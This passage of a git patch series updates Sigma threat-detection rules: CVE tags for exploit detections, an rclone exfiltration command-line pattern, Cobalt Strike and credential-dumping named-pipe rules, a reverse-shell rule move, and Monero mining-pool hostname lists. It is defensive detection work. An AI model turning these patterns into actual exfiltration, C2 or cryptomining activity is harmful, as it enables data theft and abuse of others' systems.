https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882 - https://isc.sans.edu/diary/26734 - https://twitter.com/jas502n/status/1321416053050667009?s=20 - https://twitter.com/sudo_sudoka/status/1323951871078223874 - - https://nvd.nist.gov/vuln/detail/cve-2020-14882 logsource: category: webserver detection: @@ -29,3 +27,4 @@ tags: - attack.t1100 # an old one - attack.t1190 - attack.initial_access + - cve.2020.14882 diff --git a/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml b/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml index f7ac95eb..5663b39d 100644 --- a/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml +++ b/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml @@ -5,10 +5,8 @@ description: Detects exploitation attempts on Cisco ASA FTD systems exploiting C author: Florian Roth date: 2021/01/07 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452 - https://twitter.com/aboul3la/status/1286012324722155525 - https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter - - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 logsource: category: webserver detection: @@ -35,3 +33,4 @@ tags: - attack.t1100 # an old one - attack.t1190 - attack.initial_access + - cve.2020.3452 \ No newline at end of file diff --git a/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml b/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml index df17a5de..410ad1e4 100644 --- a/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml +++ b/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml @@ -7,7 +7,6 @@ date: 2021/01/20 references: - https://twitter.com/pyn3rd/status/1351696768065409026 - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw - - https://nvd.nist.gov/vuln/detail/cve-2021-2109 logsource: category: webserver detection: @@ -27,3 +26,4 @@ level: critical tags: - attack.t1190 - attack.initial_access + - cve.2021.2109 \ No newline at end of file diff --git a/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml b/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml index 9da58de5..0d0e853b 100644 --- a/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml +++ b/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml @@ -5,10 +5,8 @@ description: Detects the exploitation of the VMware View Planner vulnerability d author: Bhabesh Raj date: 2020/03/10 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21978 - https://twitter.com/wugeej/status/1369476795255320580 - https://paper.seebug.org/1495/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-21978 logsource: category: webserver detection: @@ -28,3 +26,4 @@ level: high tags: - attack.initial_access - attack.t1190 + - cve.2021.21978 diff --git a/rules/web/web_cve_2021_26814_wzuh_rce.yml b/rules/web/web_cve_2021_26814_wzuh_rce.yml index 03012d37..0fba39bf 100644 --- a/rules/web/web_cve_2021_26814_wzuh_rce.yml +++ b/rules/web/web_cve_2021_26814_wzuh_rce.yml @@ -5,9 +5,7 @@ description: Detects the exploitation of the Wazuh RCE vulnerability described i author: Florian Roth date: 2021/05/22 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26814 - https://github.com/WickdDavid/CVE-2021-26814/blob/main/PoC.py - - https://nvd.nist.gov/vuln/detail/cve-2021-21978 logsource: category: webserver detection: @@ -23,3 +21,5 @@ level: high tags: - attack.initial_access - attack.t1190 + - cve.2021.21978 + - cve.2021.26814 \ No newline at end of file diff --git a/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml b/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml index 73316e52..1061b978 100644 --- a/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml +++ b/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml @@ -6,9 +6,7 @@ author: Bhabesh Raj date: 2021/01/25 references: - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-28188 - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - - https://nvd.nist.gov/vuln/detail/cve-2020-28188 logsource: category: webserver detection: @@ -35,3 +33,4 @@ level: critical tags: - attack.t1190 - attack.initial_access + - cve.2020.28188 \ No newline at end of file diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml index 26866f88..72ac6b83 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml @@ -8,11 +8,11 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://twitter.com/fuzzyf10w/status/1410202370835898371 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/06/30 modified: 2021/07/08 tags: - attack.execution + - cve.2021.1675 logsource: product: windows service: printservice-admin diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml index 4fbbee51..82341850 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml @@ -6,10 +6,10 @@ status: experimental level: critical references: - https://twitter.com/MalwareJake/status/1410421967463731200 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/07/01 tags: - attack.execution + - cve.2021.1675 logsource: product: windows service: printservice-operational diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml index d36b0ea4..902544f9 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml @@ -6,11 +6,11 @@ status: experimental level: critical references: - https://twitter.com/INIT_3/status/1410662463641731075 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-34527 date: 2021/07/02 tags: - attack.execution + - cve.2021.1675 + - cve.2021.34527 logsource: product: windows service: security diff --git a/rules/windows/driver_load/driver_load_vuln_dell_driver.yml b/rules/windows/driver_load/driver_load_vuln_dell_driver.yml index ea92afb4..1e361bd9 100644 --- a/rules/windows/driver_load/driver_load_vuln_dell_driver.yml +++ b/rules/windows/driver_load/driver_load_vuln_dell_driver.yml @@ -5,12 +5,12 @@ author: Florian Roth date: 2021/05/05 references: - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ - - https://nvd.nist.gov/vuln/detail/cve-2021-21551 logsource: category: driver_load product: windows tags: - attack.privilege_escalation + - cve.2021.21551 detection: selection_image: ImageLoaded|contains: '\DBUtil_2_3.Sys' diff --git a/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml b/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml index 397a66b1..bd5fb4ab 100644 --- a/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml +++ b/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml @@ -5,7 +5,6 @@ description: Detect DLL deletions from Spooler Service driver folder references: - https://github.com/hhlxf/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 author: Bhabesh Raj date: 2021/07/01 modified: 2021/08/24 @@ -14,6 +13,7 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1574 + - cve.2021.1675 logsource: category: file_delete product: windows diff --git a/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml index c1f90858..1c07a1d3 100644 --- a/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml @@ -8,12 +8,12 @@ modified: 2021/09/09 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ - - https://nvd.nist.gov/vuln/detail/cve-2021-33771 - - https://nvd.nist.gov/vuln/detail/cve-2021-31979 tags: - attack.credential_access - attack.t1566 - attack.t1203 + - cve.2021.33771 + - cve.2021.31979 # - threat_group.Sourgum logsource: product: windows diff --git a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml index 9f426abd..25264ba5 100644 --- a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml +++ b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml @@ -8,12 +8,12 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/06/29 modified: 2021/07/01 tags: - attack.execution - attack.privilege_escalation + - cve.2021.1675 logsource: category: file_event product: windows diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index ea5cc888..e4acb494 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -9,13 +9,13 @@ references: - https://github.com/FireFart/hivenightmare/ - https://github.com/WiredPulse/Invoke-HiveNightmare - https://twitter.com/cube0x0/status/1418920190759378944 - - https://nvd.nist.gov/vuln/detail/cve-2021-36934 logsource: product: windows category: file_event tags: - attack.credential_access - attack.t1552.001 + - cve.2021.36934 detection: selection: - TargetFilename|contains: diff --git a/rules/windows/image_load/sysmon_spoolsv_dll_load.yml b/rules/windows/image_load/sysmon_spoolsv_dll_load.yml index 38e94f80..44ff79a9 100644 --- a/rules/windows/image_load/sysmon_spoolsv_dll_load.yml +++ b/rules/windows/image_load/sysmon_spoolsv_dll_load.yml @@ -4,8 +4,6 @@ status: experimental description: Detect DLL Load from Spooler Service backup folder references: - https://github.com/hhlxf/PrintNightmare - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-34527 author: FPT.EagleEye, Thomas Patzke (improvements) date: 2021/06/29 modified: 2021/08/24 @@ -14,6 +12,8 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1574 + - cve.2021.1675 + - cve.2021.34527 logsource: category: image_load product: windows diff --git a/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml b/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml index b0102bf5..fe5b0da8 100644 --- a/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml +++ b/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml @@ -6,13 +6,12 @@ author: Bhabesh Raj status: experimental level: critical references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26857 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ - - https://nvd.nist.gov/vuln/detail/cve-2021-26857 date: 2021/03/03 tags: - attack.t1203 - attack.execution + - cve.2021.26857 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_exploit_cve_2019_1378.yml b/rules/windows/process_creation/win_exploit_cve_2019_1378.yml index a4593acf..43b24985 100644 --- a/rules/windows/process_creation/win_exploit_cve_2019_1378.yml +++ b/rules/windows/process_creation/win_exploit_cve_2019_1378.yml @@ -14,6 +14,7 @@ tags: - attack.t1059.003 - attack.t1059 # an old one - attack.t1574 + - cve.2019.1378 logsource: category: process_creation product: windows From 193357cf174fe95be8a6b59ed327568c5a78e5c5 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 18:51:40 +0200 Subject: [PATCH 1326/1367] Add cve tags --- .../zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml index 6ebaab90..da006cf6 100644 --- a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -16,8 +16,8 @@ references: tags: - attack.execution - - cve-2021-1678 - - cve-2021-1675 + - cve.2021.1678 + - cve.2021.1675 - cve.2021.34527 logsource: product: zeek From 8eee468cc3c2716236cd61a71555ccc4c767a20a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 20:49:30 +0200 Subject: [PATCH 1327/1367] Add detect_by_option --- .../windows/process_creation/win_susp_rclone_execution.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index 5f185a57..9dfaab71 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -20,6 +20,11 @@ logsource: product: windows category: process_creation detection: + detect_by_option: + CommandLine|contains|all: + - '--config ' + - '--no-check-certificate ' + - ' copy ' exec_selection: Image|endswith: '\rclone.exe' ParentImage|endswith: @@ -45,7 +50,7 @@ detection: - 'no-check-certificate ' description_selection: Description: 'Rsync for cloud storage' - condition: command_selection and ( description_selection or exec_selection ) + condition: detect_by_option or command_selection and ( description_selection or exec_selection ) fields: - CommandLine - ParentCommandLine From ad0bcebe9cec2f726b808d1199f8a7e64345183f Mon Sep 17 00:00:00 2001 From: WojciechLesicki Date: Mon, 25 Oct 2021 21:30:33 +0200 Subject: [PATCH 1328/1367] Adding some additional details about sysmon config and also way to test detection. --- rules/windows/pipe_created/pipe_created_tool_psexec.yml | 3 ++- rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml | 3 +-- .../pipe_created/sysmon_cred_dump_tools_named_pipes.yml | 1 + rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml | 2 +- rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml | 2 +- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- rules/windows/pipe_created/sysmon_mal_namedpipes.yml | 2 +- rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml | 2 +- .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 2 +- .../pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml | 2 +- 10 files changed, 11 insertions(+), 10 deletions(-) diff --git a/rules/windows/pipe_created/pipe_created_tool_psexec.yml b/rules/windows/pipe_created/pipe_created_tool_psexec.yml index b662d0ef..900ec9f5 100644 --- a/rules/windows/pipe_created/pipe_created_tool_psexec.yml +++ b/rules/windows/pipe_created/pipe_created_tool_psexec.yml @@ -27,10 +27,11 @@ fields: logsource: category: pipe_created product: windows + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: sysmon_pipecreated: PipeName: '\PSEXESVC' condition: sysmon_pipecreated falsepositives: - unknown -level: low \ No newline at end of file +level: low diff --git a/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml b/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml index 313d3435..66e600c1 100755 --- a/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml +++ b/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml @@ -11,7 +11,7 @@ author: Markus Neis logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for PipeEvents in Symson config' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName: @@ -25,4 +25,3 @@ detection: falsepositives: - Unknown level: critical - diff --git a/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml b/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml index ad56fd69..e4c7897d 100644 --- a/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml +++ b/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml @@ -16,6 +16,7 @@ tags: logsource: product: windows category: pipe_created + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName|contains: diff --git a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml index 9d444f88..850a6f68 100644 --- a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml @@ -10,7 +10,7 @@ author: Florian Roth logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for PipeEvents in Sysmon config' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName|contains: diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml index 80ada94e..67e1f7a9 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection_MSSE: PipeName|contains|all: diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index affe16b4..ad52ba0b 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: - PipeName|re: '\\\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml index f8fbc077..835c6fde 100644 --- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml +++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml @@ -9,7 +9,7 @@ author: Florian Roth, blueteam0ps logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for PipeEvents in Sysmon config' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName: diff --git a/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml b/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml index 258a0a1d..fa35acce 100644 --- a/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml +++ b/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for PipeEvents in Symson config' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName|startswith: diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index 79ea5a81..5c8dfda6 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection_malleable_profiles: - PipeName|startswith: diff --git a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml index dfb28c36..87933c08 100644 --- a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml @@ -9,7 +9,7 @@ author: Florian Roth logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: Image|endswith: '\scrcons.exe' From 4bcde17e00341068cf34908bca2985e3f010ef4d Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 26 Oct 2021 06:49:05 +0200 Subject: [PATCH 1329/1367] Fix title --- ..._web_request.yml => process_creation_susp_web_request_cmd.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{process_creation_powershell_web_request.yml => process_creation_susp_web_request_cmd.yml} (100%) diff --git a/rules/windows/process_creation/process_creation_powershell_web_request.yml b/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml similarity index 100% rename from rules/windows/process_creation/process_creation_powershell_web_request.yml rename to rules/windows/process_creation/process_creation_susp_web_request_cmd.yml From 7c9da11fa7f127ecc216e3c4db7f101439412fbf Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 26 Oct 2021 06:49:44 +0200 Subject: [PATCH 1330/1367] fix title --- .../process_creation_susp_web_request_cmd.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml b/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml index 8e5dc23e..5fae2a85 100644 --- a/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml +++ b/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml @@ -1,7 +1,7 @@ -title: Windows PowerShell Web Request +title: Windows Suspicious Use Of Web Request in CommandLine id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d status: experimental -description: Detects the use of various web request methods (including aliases) via Windows PowerShell command +description: Detects the use of various web request with commandline tools or Windows PowerShell command,methods (including aliases) references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell From 0b46180cd285aeb5e040190e97f5cd31d59b11e5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 26 Oct 2021 08:51:54 +0200 Subject: [PATCH 1331/1367] fix: moved back connect bash to correct folder --- .../lnx_back_connect_shell_dev.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/linux/{process_creation => network_connection}/lnx_back_connect_shell_dev.yml (100%) diff --git a/rules/linux/process_creation/lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/lnx_back_connect_shell_dev.yml similarity index 100% rename from rules/linux/process_creation/lnx_back_connect_shell_dev.yml rename to rules/linux/network_connection/lnx_back_connect_shell_dev.yml From ab499c9c21697ffd2c32a12881afd6200ab1ca02 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 26 Oct 2021 08:52:07 +0200 Subject: [PATCH 1332/1367] rules: crypto coin mining --- .../lnx_crypto_mining_indicators.yml | 40 +++++++++++++++++++ .../process_creation/lnx_crypto_mining.yml | 36 +++++++++++++++++ .../win_net_crypto_mining.yml | 40 +++++++++++++++++++ .../win_crypto_mining_monero.yml | 36 +++++++++++++++++ 4 files changed, 152 insertions(+) create mode 100644 rules/linux/network_connection/lnx_crypto_mining_indicators.yml create mode 100644 rules/linux/process_creation/lnx_crypto_mining.yml create mode 100644 rules/windows/network_connection/win_net_crypto_mining.yml create mode 100644 rules/windows/process_creation/win_crypto_mining_monero.yml diff --git a/rules/linux/network_connection/lnx_crypto_mining_indicators.yml b/rules/linux/network_connection/lnx_crypto_mining_indicators.yml new file mode 100644 index 00000000..3ae3b1a7 --- /dev/null +++ b/rules/linux/network_connection/lnx_crypto_mining_indicators.yml @@ -0,0 +1,40 @@ +title: Linux Crypto Mining Pool Connections +id: a46c93b7-55ed-4d27-a41b-c259456c4746 +status: stable +description: Detects process connections to a Monero crypto mining pool +references: + - https://www.poolwatch.io/coin/monero +date: 2021/10/26 +author: Florian Roth +logsource: + product: linux + category: network_connection +detection: + selection: + DestinationHostname: + - 'pool.minexmr.com' + - 'fr.minexmr.com' + - 'de.minexmr.com' + - 'sg.minexmr.com' + - 'ca.minexmr.com' + - 'us-west.minexmr.com' + - 'pool.supportxmr.com' + - 'mine.c3pool.com' + - 'xmr-eu1.nanopool.org' + - 'xmr-eu2.nanopool.org' + - 'xmr-us-east1.nanopool.org' + - 'xmr-us-west1.nanopool.org' + - 'xmr-asia1.nanopool.org' + - 